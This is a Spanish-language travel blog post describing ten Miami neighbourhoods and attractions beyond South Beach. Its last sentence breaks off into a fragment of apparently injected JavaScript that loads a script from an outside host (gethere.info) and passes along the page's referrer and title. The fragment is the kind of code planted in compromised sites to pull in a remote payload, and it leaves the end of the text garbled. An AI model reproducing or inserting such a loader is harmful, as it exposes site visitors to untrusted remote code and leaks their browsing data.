Mucho más que South Beach: otros diez musts de Miami

31/08/2016

L2F-Jun-16-pic-Florida-Miami-mainland-Vizcaya-Vista-Aerea-FloridaStock-shutterstock_380733562-640x426

No resulta extraño afirmar que Miami Beach (y especialmente su extremo sur, la famosísima South Beach) acapara toda la atención cuando hablamos de un viaje de placer y de vacaciones. Sin embargo, la ciudad alberga muchas otras zonas repletas de historia, cultura, zonas de compras, restaurantes e, incluso, algunos rincones que nada tienen que envidiar en cuanto a playas y discotecas si los comparamos con South Beach. Pronto publicaremos más, pero aquí va un pequeño resumen de lugares que no puedes perderte durante tu paso por Miami:

Coconut Grove

A lo largo de la costa suroeste y justo bajo el centro de Miami, el barrio más antiguo de la ciudad cuenta con varias residencias de carácter histórico, como la famosa Casa Barnacle y la espectacular Villa Vizcaya (arriba), de estilo veneciano-renacentista-tropical. También aquí encontrarás una divertida zona con bares y restaurantes de lo más coqueto e interesantes tiendas, algunas de las cuales aún desprenden ese estilo bohemio y hippie que caracterizó a los momentos álgidos de Coconut Grove, incluyendo un genuino templo budista.

Coral Gables

Al oeste del centro histórico se ubica la primera ciudad “temática” de Estados Unidos, construida entre bosques de naranjos durante la década de 1920 en un estilo español colonial y mediterráneo: en la actualidad es una de las zonas más elegantes del sur de Florida, dotada con excelentes tiendas y restaurantes que se localizan tanto en su núcleo central como en el centro comercial Merrick Park; además, también ofrece museos, puntos de interés histórico, teatros y uno de los clásicos hoteles de estilo grande dame, el Biltmore. Es conocido también por su agradable vida nocturna, gracias los jóvenes que se decantan por Coral Gables para evitar el ajetreo de South Beach.

Design District

Antaño fue una zona bastante desmejorada, al norte del centro, pero acabó convirtiéndose en un lugar codiciado por diseñadores de muebles, diseñadores de interiores y arquitectos; ya ha sido completamente remozado, hasta el punto de albergar en su seno algunas de las marcas más lujosas del planeta, de corte internacional, y varios restaurantes de alta cocina. Una visita obligada para los shoppers más sibaritas.

L2F-Jun-16-pic-USA-Florida-Miami-mainland-Freedom-Tower-f11photo-shutterstock_210651820-640x424

Centro histórico

Un distrito de lo más diverso. Resulta sumamente llamativa su mitad meridional, que acoge un emblemático corredor de hoteles y negocios a lo largo de la avenida Brickwell (justo al oeste de ésta, encontrarás también un barrio famoso por sus buenos restaurantes, su vida nocturna y algunos centros comerciales), así como una combinación de negocios locales con atracciones de gran interés para los visitantes, como Bayside Marketplace, Freedom Tower (arriba), el complejo Arscht Centre y diferentes museos que abordan la historia, el arte moderno y, a partir de 2017, la ciencia y tecnología de Florida.

Key Biscayne

A medio camino entre el centro histórico y Coconut Grove encontramos esta exclusiva isla que tiene el honor de acoger dos de las playas más populares de la ciudad: el tramo de Crandon Park y la célebre playa del faro, llamada así por el histórico faro del mismo nombre ubicado en el Bill Baggs State Park. Otros dos puntos emblemáticos son el Miami Seaquarium, el mayor acuario de Estados Unidos, y el centro de naturaleza de Key Biscayne, Marjory Stoneman Douglas Biscayne Nature Center. Sí existe una oferta mucho más limitada en lo que a alojamiento y restaurantes se refiere, aunque con ilustres excepciones como el enorme complejo Ritz-Carlton y el icónico restaurante Rusty Pelican, con inmejorables vistas panorámicas.

L2F-Jun-16-pic-USA-Florida-Miami-mainland-Everglades-holbox-shutterstock_47591686-640x427

Little Havana

Localizado varias manzanas más allá de la Southwest Eight Street, al oeste del centro histórico, hablamos del barrio que cambió la fisonomía de Miami a principio de los años 60 tras albergar a buena parte de los refugiados de la dictadura castrista en Cuba. Hay partes que resultan un poco monótonas en Little Havana, sí, pero también una zona encantadora que se extiende a lo largo de varias manzanas y que podríamos considerar como su ‘centro’, repleta de restaurantes, galerías, tiendas de puros y otros pequeños negocios; no faltan lugares emblemáticos como la Tower Theater, de estilo Art Deco, un parque que homenajea a los héroes de la independencia cubana y que resulta curioso por los grupos de hombres mayores que se reúnen para jugar al dominó. ¿Qué más hace interesante a esta zona? Que la mayoría de restaurantes en la actualidad ya no son cubanos, sino centroamericanos, con sabrosísimas opciones de comida nicaragüense, salvadoreña y hondureña.

Upper East Side

Durante los años 40 y 50, Biscayne Boulevard fue considerado como el Broadway de Miami, y su declive entre las décadas de 1960 y 1990 está siendo revertido en la actualidad para hacer renacer sus vibrantes moteles “doo-wop”, típicos de mediados del siglo XX. También se están creando tiendas y restaurantes de lo más innovador: por ejemplo, ¿qué opinas de una antigua gasolinera convertida en una pizzería? 😉

West Miami

Además de un buen puñado de suburbios, aquí podrás disfrutar de diferentes atracciones, como el Miami MetroZoo (realmente recomendable, pero… ¡preferentemente no durante el calor del verano!) y el Castillo de Coral, un recinto muy peculiar con paredes hechas a base de piedras de coral que fue construido entre las décadas de 1930 y 1950 por un excéntrico inmigrante de Letonia – de hecho, no ha tardado en ser concebido como una proeza por los amantes de lo paranormal. Pero, sin duda, la auténtica estrella es el Everglades, el espectacular “río de hierba” en el que puedes practicar ciclismo, senderismo, pescar, acampar, observar cocodrilos, viajar en los famosos ‘hidrodeslizadores’ y aprender un poco más sobre las costumbres de la tribu local Miccosukee (y también – ejem – apostar en su casino).

L2F-Jun-16-pic-USA-Florida-Miami-mainland-Wynwood-Walls-DPA-640x480

Wynwood/Centro

En mi opinión, este lugar es hoy en día uno de los barrios más dinámicos y sorprendentes de Miami, un distrito lleno de almacenes que han sido tomado por artistas, diseñadores y gente joven. Además de sus galerías y el asombroso arte callejero que podrás disfrutar por doquier, acoge originales tiendas, restaurantes modernos y locales para salir de noche; y, por si esto fuera poco, el segundo sábado de cada mes organizan un ‘paseo artístico’ que se acaba convirtiendo en una fiesta. Por su parte, un par de manzanas al noreste, un área recientemente remodelada llamada Midtown también ofrece divertidos restaurantes y bares.

Otros

Otras áreas de interés en la ciudad incluyen North Miami, que lleva años intentando que se refieran a ella como NoMi; aunque en realidad no se ha ‘logrado’, sí merece la pena llegar hasta aquí por su Museo de Arte Contemporáneo (MOCA) y, sobre todo, por su atmosférico “Antiguo Monasterio Español”, un auténtico monasterio segoviano del siglo 12 que fue importado a Estados Unidos por el magnate William Randolph Hearst en 1925 y que acabó siendo una iglesia protestante. Está abierto al público.

Por otra parte, los nuevos intentos de desarrollo incluyen la promoción de barrios ‘étnicos’, como Little Haiti, que alberga desde hace años uno de los mejores locales de música indie en Miami, el Churchill’s, y que ahora cuenta también con un nuevo centro cultural y artístico; no se queda atrás Opa Locka, con un centro caracterizado por su arquitectura árabe que ha sido mal administrado en las décadas anteriores, pero que recientemente ha empezado a renacer gracias a su propio centro de arte contemporáneo.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;